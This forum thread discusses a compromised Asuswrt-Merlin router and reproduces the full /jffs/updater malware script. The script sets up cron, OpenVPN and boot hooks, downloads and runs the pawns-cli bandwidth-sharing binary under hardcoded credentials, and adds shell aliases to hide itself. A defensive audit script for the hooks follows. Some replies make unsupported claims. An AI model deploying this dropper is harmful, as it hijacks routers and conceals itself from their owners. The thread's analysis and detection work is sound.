Malware /jffs/updater script.


The presence of the proton.me domain in the script is very strange. It belongs to Proton Mail, which is well known as an extremely secure mail, VPN and cloud storage service. Personally I have ultimate trust in them. Maybe it is in the script just by coincidence, or has been put there just to fool possible investigations?
 
I know English isn't your first language but what we've been discussing here is malware. An exploit would be the method used to get it onto the router.

Oh my o_O... He's not infected by malware. He just got attacked by SOMEONE with an exploit. That's why I'm talking about the exploit. You don't know about the code (script) that he posted, right? I do know about the exploit he posted very well. ;)
 
I've already mentioned it.

None of your solutions work if he's targeted, because this is not normal hacking but an exploit.

Hackers used an exploit to install malware. In fact, "normal hacking" would be worse, that would mean someone is actively trying to hack you rather than just an automated botnet finding a way in.

You're not making any sense. This user likely was not "targeted". These groups flood out looking for vulnerabilities, and when they find one, they (usually in an automated fashion) use it. If you fix the vulnerability and clean the malware, they move on. Unless they know you have a bunch of crypto or something else of a lot of value, they are not wasting hours of time on you. They spend that time on banks and crypto exchanges.

Saying you're screwed for life because you're "targeted" (how do you know they were?) is absurd. Banks are targeted tens of thousands of times a day; the ones that have vulnerabilities get breached, the ones that don't carry on. They don't go out of business just because they see someone trying to get in.
 
It could possibly be DDNS related, however one factor to consider is that the wget log I posted shows that the first appearance happened right after a firmware update check on the router was conducted.
We can't really assume that it's anything to do with wget itself or the firmware check. The log is after all a log just for processes that call wget, and they're not timestamped so we don't know how close together those events were.

The only thing for sure that the log tells us is that the unwanted wget call was initiated by the crontab entry.
 
It could possibly be DDNS related, however one factor to consider is that the wget log I posted shows that the first appearance happened right after a firmware update check on the router was conducted.

Code:
(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater

While I am not saying it is RMerlin related, someone snooping could have seen an opportunity to exploit a vulnerability in wget or the connection. I am still a bit on the fence about this one. I was out of town the day the malware hit the router. No devices were online except for some IoT-blocked cameras. All computers were fully shut down.

Or you had the malware and it changed the download target for firmware in order to install a vulnerable one they've created. Or the update process just "woke" up the malware.
 
Do not trust ANY consumer routers, including ASUS. There are a lot of unknown vulnerabilities, like zero-day attacks. There are too many unknown vulnerabilities that manufacturers never know about, even in the future. Those vulnerabilities are traded for money on the black market.

Yup so instead everyone should buy a $10,000 enterprise router that is just as susceptible to vulnerabilities.
 
Thanks for the information about the old firmware versions. ;)

Yes you are right. I currently have these basic settings:

#WAN

Code:
MAC Address = Changed

#Firewall

Code:
Enable Firewall    = Yes
Enable DoS protection = Yes
Respond ICMP Echo (ping) Request from WAN = No

#System

Code:
Router Login Password = Strong
Enable SSH = Lan Only
Allow SSH Port Forwarding = No
SSH Port = Changed
Allow Password Login = No
Authorized Keys = Yes (+ private Key with strong password)

Code:
Authentication Method = HTTPS
HTTPS LAN port = Changed
Installed Server Certificate = Yes

Code:
Enable Web Access from WAN = No
Enable Access Restrictions = Yes (x2 devices of my network)

Note: With the option "Allow Password Login = No", I have disabled it to reject USER + PASSWORD login requests over SSH, allowing only the private key. Is this configuration/thought correct?

So what comes to my mind, for example these two "options":

- an infected client
- OpenVPN service vulnerability/misconfiguration (server/client) - I use this option a lot.

Is WireGuard currently more secure than OpenVPN? Or have the vulnerabilities not yet been discovered/exposed?

Both VPNs are only as secure as you configure them to be.

Password login disabled with a requirement for a private key is more secure, so you're good there (as long as you generate a good key). I believe some SSH daemons can be configured for both private key and password, but I don't believe that combo is supported here; I believe it is one or the other. If nothing has changed, Merlin by default enables brute force protection on SSH, so that also helps a lot, even with password login (but I still recommend key login).
 
Oh my o_O... He's not infected by malware. He just got attacked by SOMEONE with an exploit. That's why I'm talking about the exploit. You don't know about the code (script) that he posted, right? I do know about the exploit he posted very well. ;)

You're saying code/script is not malware? I think something is getting lost in translation.
 
The presence of the proton.me domain in the script is very strange. It belongs to Proton Mail, which is well known as an extremely secure mail, VPN and cloud storage service. Personally I have ultimate trust in them. Maybe it is in the script just by coincidence, or has been put there just to fool possible investigations?
It's like this. He got compromised through the following process.
Attacker > Exploit > Attacker owns router > Attacker puts some scripts into the router, including a source address which provides the script file > Script file is downloaded > Attacker runs the script which was downloaded from the source address > From now on, the victim's router works as a proxy > Attacker uses this router as a paid proxy service for money > Consumers don't know they are using someone's hacked router as a proxy.
 
It makes sense though; how else would someone know they could monetize off the source router's connection? Obviously, the person knew what they were doing. It is a highly targeted approach to achieving their goal.
These hackers are going to be hugely disappointed if they're trying to turn our routers into bitcoin miners. LOL :p
 
Reading about the black market and money... I'm interested in purchasing a pack of unknown vulnerabilities. There is a local farmer's market and all cash. :cool:
 
You're saying code/script is not malware? I think something is getting lost in translation.
I'm pretty sure you are just talking about the definition from the internet. In the real world, malware and exploit are different. An exploit is an ATTACK, or code for a vulnerability attack. Malware is just the payload in this situation. A payload is among the malware which can be used as an attack tool.
 
Reading about the black market and money... I'm interested in purchasing a pack of unknown vulnerabilities. There is a local farmer's market and all cash. :cool:
They give you dedicated tools if you pay the money. You can find them easily.
 
Or you had the malware and it changed the download target for firmware in order to install a vulnerable one they've created. Or the update process just "woke" up the malware.
As much as I would like to believe this is the case, that went out the window today as I turned on several workstations that haven't been used in months. I updated the virus security definitions and ran security scans. Not a trace of infection on any. Ran virus checks on mobile devices as well. No infections detected.

It is possible it could have been embedded infection that was "woke" by the firmware checks, but then most likely more people would be here reporting the issue as I suspect other people would have had infected batches of firmware.
 
As much as I would like to believe this is the case, that went out the window today as I turned on several workstations that haven't been used in months. I updated the virus security definitions and ran security scans. Not a trace of infection on any. Ran virus checks on mobile devices as well. No infections detected.
You were attacked through the following process.
Attacker > Exploit > Attacker owns router > Attacker puts some scripts into the router, including a source address which provides the script file > Script file is downloaded > Attacker runs the script which was downloaded from the source address > From now on, the victim's router works as a proxy > Attacker uses this router as a paid proxy service for money > Consumers don't know they are using someone's hacked router as a proxy. You don't have to listen to some guys above. They don't know about this type of attack. I know about this attack and exploit very well... Don't get me wrong. I'm not an attacker. :)

It is possible it could have been embedded infection that was "woke" by the firmware checks, but then most likely more people would be here reporting the issue as I suspect other people would have had infected batches of firmware.
It's almost impossible to do here, because some users here always say it doesn't exist and can't happen. They don't even know about the exploit which got you compromised. They only know the definitions of malware and exploit from the internet.
 
The presence of the proton.me domain in the script is very strange. It belongs to Proton Mail, which is well known as an extremely secure mail, VPN and cloud storage service. Personally I have ultimate trust in them. Maybe it is in the script just by coincidence, or has been put there just to fool possible investigations?
I have no doubt that Proton Mail is not knowingly involved in this. An email account is needed to run the pawns-cli software and associate multiple devices with that single account. I'm guessing this email account is also used by the malware creators to collect their money from IPRoyal.
 
What is this random /jffs/updater script?

Bash:
#!/bin/sh

if ls /jffs/p32
then
    exit
fi

cru a updater "* * * * * /jffs/updater"

nvram set vpn_server1_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server1_state | grep 2
then
    echo ""
else
    nvram set vpn_server1_state=2
    nvram set vpn_server1_nm=255.255.255.0
    nvram set vpn_server1_local=10.8.0.1
    nvram set vpn_server1_hmac=-1
    nvram set vpn_server1_errno=0
    nvram set vpn_server1_rgw=0
    nvram set vpn_server1_poll=0
    nvram set vpn_server1_reneg=-1
    nvram set vpn_server1_r1=192.168.1.50
    nvram set vpn_server1_r2=192.168.1.55
    nvram set vpn_server1_pdns=0
    nvram set vpn_server1_if=tun
    nvram set vpn_server1_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server1_remote=10.8.0.2
    nvram set vpn_server1_comp=yes
    nvram set vpn_server1_tls_keysize=0
    nvram set vpn_server1_firewall=auto
    nvram set vpn_server1_ccd=0
    nvram set vpn_server1_sn=10.8.0.0
    nvram set vpn_server1_digest=SHA1
    nvram set vpn_server1_c2c=0
    nvram set vpn_server1_state=2
    nvram set vpn_server1_crypt=tls
    nvram set vpn_server1_plan=1
    nvram set vpn_server1_ccd_excl=0
    nvram set vpn_server1_proto=udp
    nvram set vpn_server1_igncrt=0
    nvram set vpn_server1_cipher=AES-128-CBC
    nvram set vpn_server1_dhcp=1
    nvram set vpn_server1_port=31194
fi

nvram set vpn_server_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server_state | grep 2
then
    echo ""
else
    nvram set vpn_server_state=2
    nvram set vpn_server_nm=255.255.255.0
    nvram set vpn_server_local=10.8.0.1
    nvram set vpn_server_hmac=-1
    nvram set vpn_server_errno=0
    nvram set vpn_server_rgw=0
    nvram set vpn_server_poll=0
    nvram set vpn_server_reneg=-1
    nvram set vpn_server_r1=192.168.1.50
    nvram set vpn_server_r2=192.168.1.55
    nvram set vpn_server_pdns=0
    nvram set vpn_server_if=tun
    nvram set vpn_server_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server_remote=10.8.0.2
    nvram set vpn_server_comp=yes
    nvram set vpn_server_tls_keysize=0
    nvram set vpn_server_firewall=auto
    nvram set vpn_server_ccd=0
    nvram set vpn_server_sn=10.8.0.0
    nvram set vpn_server_digest=SHA1
    nvram set vpn_server_c2c=0
    nvram set vpn_server_state=2
    nvram set vpn_server_crypt=tls
    nvram set vpn_server_plan=1
    nvram set vpn_server_ccd_excl=0
    nvram set vpn_server_proto=udp
    nvram set vpn_server_igncrt=0
    nvram set vpn_server_cipher=AES-128-CBC
    nvram set vpn_server_dhcp=1
    nvram set vpn_server_port=31723
fi

nvram set jffs2_exec='ash /jffs/updater'
nvram set script_usbmount='ash /jffs/updater'
nvram set script_usbumount='ash /jffs/updater'

nvram commit

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

if ps | grep updateservice | grep -v grep
then
        echo "Running"
else
        if test -s /tmp/updateservice
        then
                echo " "
        else
        rm /tmp/updateservice
                if cat /proc/cpuinfo | grep -i ARMv7
                then
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli
                        chmod u+x /tmp/updateservice
                fi
        fi
        if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
                echo " "
        else
                rm /tmp/updateservice
                wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
                chmod u+x /tmp/updateservice
                if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
            echo " "
        else
            rm /tmp/updateservice
                    wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli
                    chmod u+x /tmp/updateservice
                    if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            then
                echo " "
            else
                rm /tmp/updateservice
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_aarch64/pawns-cli
                        chmod u+x /tmp/updateservice
                        /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            fi
        fi
        fi
fi

Code:
* * * * * /jffs/updater #updater#

@RMerlin is this a default script?
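The posted script persists through four places a quick look can miss: the OpenVPN server "custom config" (an `up` script with `script-security 3`), the `jffs2_exec` boot hook, the USB mount/unmount hooks, a per-minute cron job, and `ls`/`ps`/`cat` aliases in `~/.profile` that hide the files. The following audit is an added example written for this thread, not code from the thread or from Asuswrt-Merlin; it assumes the stock `nvram`, `cru` and busybox tools of a Merlin router, and each check reads a file so it can also run against saved copies of `nvram show` and `cru l` output.

```shell
#!/bin/sh
# Added example (not from the thread or Asuswrt-Merlin): read-only audit for the
# persistence hooks installed by the posted /jffs/updater script.

DROPPER='/jffs/updater'     # script path used by the posted cron and nvram hooks
PAYLOAD='updateservice'     # name of the downloaded pawns-cli binary in /tmp

# Count nvram settings that launch the dropper: both vpn_server1_custom and
# vpn_server_custom (OpenVPN up-script), the JFFS boot script and the USB hooks.
# Arg 1: file holding `nvram show` output.
audit_nvram() {
    grep -E '^(vpn_server[0-9]*_custom|jffs2_exec|script_usbmount|script_usbumount)=' "$1" \
        | grep -c -F "$DROPPER" || true
}

# Count cron entries running the dropper (the posted one runs every minute, tag #updater#).
# Arg 1: file holding `cru l` output.
audit_cron() {
    grep -c -F "$DROPPER" "$1" || true
}

# Count ls/ps/cat aliases that filter the dropper or payload out of their output.
# On a compromised box, run \ls, \ps and \cat interactively to bypass such aliases.
# Arg 1: path to the .profile to inspect.
audit_profile() {
    grep -E '^alias (ls|ps|cat)=' "$1" \
        | grep -c -E "grep -v (updater|$PAYLOAD)" || true
}

# Count dropped files under a root dir ("/" on the router). [ -e ] is a shell
# builtin, so the .profile aliases cannot hide these from it.
audit_files() {
    n=0
    [ -e "$1/jffs/updater" ] && n=$((n + 1))
    [ -e "$1/tmp/$PAYLOAD" ] && n=$((n + 1))
    echo "$n"
}

# Constructed samples (not the thread's router) mirroring what the posted script writes.
write_samples() {
    cat > "$1/nvram" <<'EOF'
vpn_server1_custom=up "/bin/sh /jffs/updater"
script-security 3
jffs2_exec=ash /jffs/updater
script_usbmount=ash /jffs/updater
lan_hwaddr=00:11:22:33:44:55
EOF
    printf '* * * * * /jffs/updater #updater#\n' > "$1/cron"
    cat > "$1/profile" <<'EOF'
alias ls='f(){ ls "$@" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'
alias ps='f(){ ps "$@" | grep -v updateservice | grep -v updater; unset -f f; }; f'
EOF
    mkdir -p "$1/jffs" "$1/tmp" && : > "$1/jffs/updater"
}

# Live run on the router: collect the real sources, then audit them.
audit_router() {
    d=$(mktemp -d)
    nvram show > "$d/nvram" 2>/dev/null
    cru l > "$d/cron" 2>/dev/null
    printf 'nvram hooks: %s\ncron jobs: %s\nhiding aliases: %s\ndropped files: %s\n' \
        "$(audit_nvram "$d/nvram")" "$(audit_cron "$d/cron")" \
        "$(audit_profile "$HOME/.profile")" "$(audit_files /)"
    rm -rf "$d"
}
```

A clean router reports 0 for every line; any non-zero count is a reason to remove the hooks, factory-reset and re-flash rather than only deleting the files, since the script re-creates everything on the next cron tick.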
Unfortunately this thread is going downhill fast. Also, surprised Merlin hasn’t jumped in here. Must be on vacation.
 
It's definitely malware. I decompiled the binary "https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli" in this link. It's a crypto miner.

It still sucks that it was on there, but having that on there is way better than a lot of alternatives. Below is a bit of the content from one of the files in the malware.

 
So my guess is that this is a modified version of some old malware that's been repurposed to monetize the theft of your bandwidth.
Crypto mining botnets perhaps?
 